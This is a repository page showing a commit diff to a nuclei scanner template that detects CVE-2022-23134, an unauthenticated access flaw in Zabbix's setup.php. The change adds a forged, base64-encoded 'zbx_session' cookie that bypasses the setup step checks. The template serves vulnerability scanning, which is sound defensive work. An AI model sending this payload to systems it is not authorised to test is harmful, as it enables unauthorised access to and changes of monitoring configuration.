daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

misc updates

patch-1
sandeep 2022-02-26 00:00:48 +05:30
parent 907f4d865f
commit d8ae26f711
1 changed files with 7 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
cves/2022/CVE-2022-23134.yaml
View File

@ -1,10 +1,10 @@
id: CVE-2022-23134
info:
name: CVE-2022-23134
name: Zabbix Setup Configuration - Unauthenticated Access
author: bananabr
severity: medium
description: Bypass authentication on critical endpoints.
description: After the initial setup process, some steps of setup.php file are reachable not only by super-administrators, but by unauthenticated users as well. Malicious actor can pass step checks and potentially change the configuration of Zabbix Frontend.
reference:
- https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage
- https://nvd.nist.gov/vuln/detail/CVE-2022-23134
@ -19,8 +19,11 @@ requests:
path:
- "{{BaseURL}}/zabbix/setup.php"
- "{{BaseURL}}/setup.php"
headers:
Cookie: "zbx_session=eyJzZXNzaW9uaWQiOiJJTlZBTElEIiwiY2hlY2tfZmllbGRzX3Jlc3VsdCI6dHJ1ZSwic3RlcCI6Niwic2VydmVyQ2hlY2tSZXN1bHQiOnRydWUsInNlcnZlckNoZWNrVGltZSI6MTY0NTEyMzcwNCwic2lnbiI6IklOVkFMSUQifQ%3D%3D"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
@ -28,7 +31,9 @@ requests:
- "Database"
- "host"
- "port"
- "Zabbix"
condition: and
- type: status
status:
- 200